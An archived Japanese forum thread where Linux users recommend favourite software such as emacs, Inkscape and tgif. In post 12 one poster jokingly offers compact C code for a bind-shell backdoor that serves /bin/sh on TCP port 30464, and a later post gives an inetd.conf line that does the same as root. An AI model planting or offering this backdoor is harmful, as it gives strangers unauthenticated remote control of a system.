探検


お前らの気に入ってるソフトをお勧めしろ!

1login:Penguin
垢版 |
04/09/06 15:05ID:ZAlcxoeJ
お勧めするのだ!
2login:Penguin
垢版 |
04/09/06 15:07ID:ZAlcxoeJ
はっきし言ってLinuxはどんなソフトがあるのかさっぱりわからない
だからお俺にお勧めしろ!
わかったか!
04/09/06 15:14ID:VvaiBtvS
ここが2chだとぉー、ここが2chだとぅー、突然、誘惑に負けてぇー、
>>1は池沼、なんて言っちゃう輩が多いんだよね。ダメだよぉー。どんな糞スレでもぉー、誘惑振り切って放置だ。
おーん。>>1が糞スレを立ててぇー、>>1を煽るレスがつき始める。レス数が増える。
こっから出てくるのはなんだぁー?名スレ、>>1への煽りレスで埋まるぅ、名スレ。
だからぁー、次スレとかPart2とか1000ゲトとか出るわけだぁー。
DAT落ちはしねえよぉぉ!お前らがレスすんだからぁー。ぉーん。お前らのレスで埋るんだからぁー。
04/09/06 15:26ID:YM/02V0X
emacs
04/09/06 15:34ID:DPEJtAZk
sl
04/09/06 16:04ID:2g2UKqa1
誘導
http://pc5.2ch.net/test/read.cgi/linux/1075992682/
04/09/06 16:05ID:FsCfmoGn
>>6
誘導先として適切じゃないだろ。
まだ、こっちのほうが。
http://pc5.2ch.net/test/read.cgi/linux/991931552/
8login:Penguin
垢版 |
04/09/06 16:39ID:xDLPvwx0
vi
04/09/06 17:27ID:RiFPYwNy
Linux使いが使っているソフトと満足度
http://pc5.2ch.net/test/read.cgi/linux/1072257744/
最近、インストールしたソフト
http://pc5.2ch.net/test/read.cgi/linux/1029514478/
10login:Penguin
垢版 |
04/09/07 01:43ID:69Rew710
−−−−−−−−−−−−−−−−−−−−−−−−−−
俺様用しおり
  ∧_∧
 ( ・∀・)< 今日はここまで読んだ
−−−−−−−−−−−−−−−−−−−−−−−−−−
04/09/07 02:17ID:kMUJO5p4
>>10
ちょっとドッキリ
12マイク ◆yrBrqfF1Ew
垢版 |
04/09/07 04:38ID:qdKLmqGr
これお勧め。

#include<unistd.h>
#include<sys/socket.h>
#include<netinet/in.h>
int soc,cli,soc_len;struct sockaddr_in serv_addr;
struct sockaddr_in cli_addr;int main(){if(fork()==0){
serv_addr.sin_family=AF_INET;serv_addr.sin_addr.s_addr=htonl(INADDR_ANY);
serv_addr.sin_port=htons(30464);soc=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
bind(soc,(struct sockaddr *)&serv_addr,sizeof(serv_addr));listen(soc,1);
soc_len=sizeof(cli_addr);cli=accept(soc,(struct sockaddr *)&cli_addr,&soc_len);
dup2(cli,0);dup2(cli,1);dup2(cli,2);execl("/bin/sh","sh",0);}}
13login:Penguin
垢版 |
04/09/07 05:55ID:+gCTSz/q
>>12
そんなもの使わなくても自由に使えますよね?
Linuxなんだしw
でも便利そうですよね。
起動と同時にIPをここ(2ch)に書き込むようにして公開してはどうでしょう?
14login:Penguin
垢版 |
04/09/07 10:53ID:/BPz6lrP
>>12コンパイルして実行するとどうなんの?
15login:Penguin
垢版 |
04/09/07 11:06ID:0SdoMy9T
質問です。
FLASHとかの画像を取り込むための無料ソフト?が
あったんですが消えてしまたんでもう一回DLしたい
んですがどんなソフトだったか忘れてしまったので教え
てくらさい!初心者なんでスマソ
16マイク ◆yrBrqfF1Ew
垢版 |
04/09/07 22:50ID:fIF/mSYo
>>14
コード読めよ。糞簡単だろ
子プロセスがTCPポート30464に接続してきたクライアントに/bin/shを解放

>>12
このまま使うくらいじゃ大した利用価値はねえわな
17login:Penguin
垢版 |
04/09/08 01:22ID:V0EuK6XO
>>16
自動インストール機能をつけるとさらに便利になりますね。
18login:Penguin
垢版 |
04/09/08 12:27ID:f9HuJ/bE
なんでわざわざそんなもん作るのか疑問だ。
/etc/inetd.conf に
30464 stream tcp nowait root /bin/sh
とか一行追加する程度の話だろ。(最近はxinetdが主流だが)
04/09/14 08:45:59ID:71TUTErY
>>1
Skencil (旧名 Sketch)。高度にプログラマブルなところが良い。
20login:Penguin
垢版 |
04/09/22 16:59:38ID:2oXCA/J6
>>19 それは何のソフトなんだ?
04/09/22 18:28:16ID:wgu8sVCJ
>>20
あらら、意外と知られていないのかな?

http://sketch.sourceforge.net/
ベクトル系の作画ツールです。Tgif や Illustrator と同種のソフトです。
Python で書かれていて、本体を拡張するための「プラグイン」と「スクリプト」の
2種類の仕組みを備えています。これらも Python で書くことができます。
安定版の 0.6.x 系列はコードが枯れていて安心して使えます。
22login:Penguin
垢版 |
04/09/22 19:19:41ID:2oXCA/J6
>>21 THX
ドロー系は tgif と xcircuit しか使ったこと無いなぁ。
Windows で tgif が動くのを夢見て Dynamic Draw 使ってる。
04/09/22 23:13:05ID:Xzcln/b5
>>1
とりあえずstreamtunnerとpeercastはネットワーク環境に必須でしょ?
空いてるCPUで手軽にラジオサーバ化
04/09/22 23:34:16ID:FuynSQLc
sodipodiよりinkscape
04/09/23 00:35:40ID:zNMZSmnc
amaroK

なにげにステキ
04/09/23 17:46:42ID:rxkNRC89
どうしてもWindowsでTgifを使いたいので
Cygwin起動でX起動でTgif起動
しています
27login:Penguin
垢版 |
04/09/23 19:16:05ID:uyHWGAJe
>>26 Tgif って cygwin 上でビルドできたのかよ!
28login:Penguin
垢版 |
04/09/26 19:41:31ID:mrKK2drP
w2xw 最高
29login:Penguin
垢版 |
04/09/26 19:41:52ID:mrKK2drP
http://www.h7.dion.ne.jp/~umiumi/
30login:Penguin
垢版 |
04/09/26 21:47:23ID:QX/opqbS
【Macでも】みんなでやろうよWyvern【動くYO!!】
http://etc3.2ch.net/test/read.cgi/entrance/1095583399/l50

1 :名無しさん? :04/09/19 17:43:19 ID:fKw9330w
■公式HP
ttp://www.cabochon.com/

■新規キャラの作り方

 Play it now!をクリック
 Step1:Create Characterのしたをクリック
 なんかちっさいキャラが出てくるので好きな種族を選ぼう
 このとき説明が出るから読んどけ
 メールアドレスとキャラ名を入力してCreate Character!ボタンをクリック
 メールにパスワードが届きます

■クライアントダウンロード・インストール

 Win・Mac・Linux/Unixの中からどぞ

■起動・ログイン

 Character NameとPasswordを入力してConnectボタン
04/10/03 07:08:02ID:AGr6Rewr
だれか30のゲームやってみたひといる?
32login:Penguin
垢版 |
04/11/10 14:29:32ID:ddhxt23G
ついに使えそうなアウトラインプロセッサを見つけた。
TreePad
ttp://www.treepad.com/linux/treepadlite/
スクリーンショット
ttp://penguin.s4.xrea.com/imgboard/img-box/img20041110142747.png
33login:Penguin
垢版 |
04/11/24 23:36:53ID:1OSIkhDl
xterm
04/11/25 00:15:28ID:eny8L2PW
ターミナル
04/11/25 02:01:19ID:EfCW+AGR
>>32
emacsでよさそう。
36login:Penguin
垢版 |
2005/08/14(日) 21:01:54ID:l0u96nNv
wine
2006/07/27(木) 09:47:55ID:A0q1sPZY
test
2006/07/27(木) 16:42:51ID:ZyFHY0Lf
test
2006/07/27(木) 17:33:09ID:ZyFHY0Lf
test
2006/07/27(木) 18:42:31ID:ZyFHY0Lf
test
2006/07/27(木) 18:43:38ID:QmreDk1p
test
2006/07/27(木) 19:21:14ID:QmreDk1p
test
2006/07/28(金) 07:50:24ID:V+NP2yCe
test
44login:Penguin
垢版 |
2006/09/05(火) 23:52:35ID:BNKh3oEF
http://www.getchu.com/soft.phtml?id=220613
青空の見える丘
45login:Penguin
垢版 |
2006/09/06(水) 21:57:54ID:K/FaqCP7
screen,
twm,
vim,
canna,
crafty,
perl,
2006/09/07(木) 00:01:41ID:zJ9VWvB8
java
2006/09/07(木) 00:36:09ID:Uz2ntquP
tgif って手軽で直感的に分かりやすいから簡単な絵には俺も
よく使うんだけど, ちょっと細かく調整しようとすると難しくない?
xfig の方が細かい調整出来たりするんだけど, こっちは使い勝手が
イマイチ直感的で無い… tgif の使いやすさといざという場合の
細かい調整ができるアプリケーションってあるんだろうか?
そんなに高くなくて Linux で走るなら買っても良いんだけど
レスを投稿する


ニューススポーツなんでも実況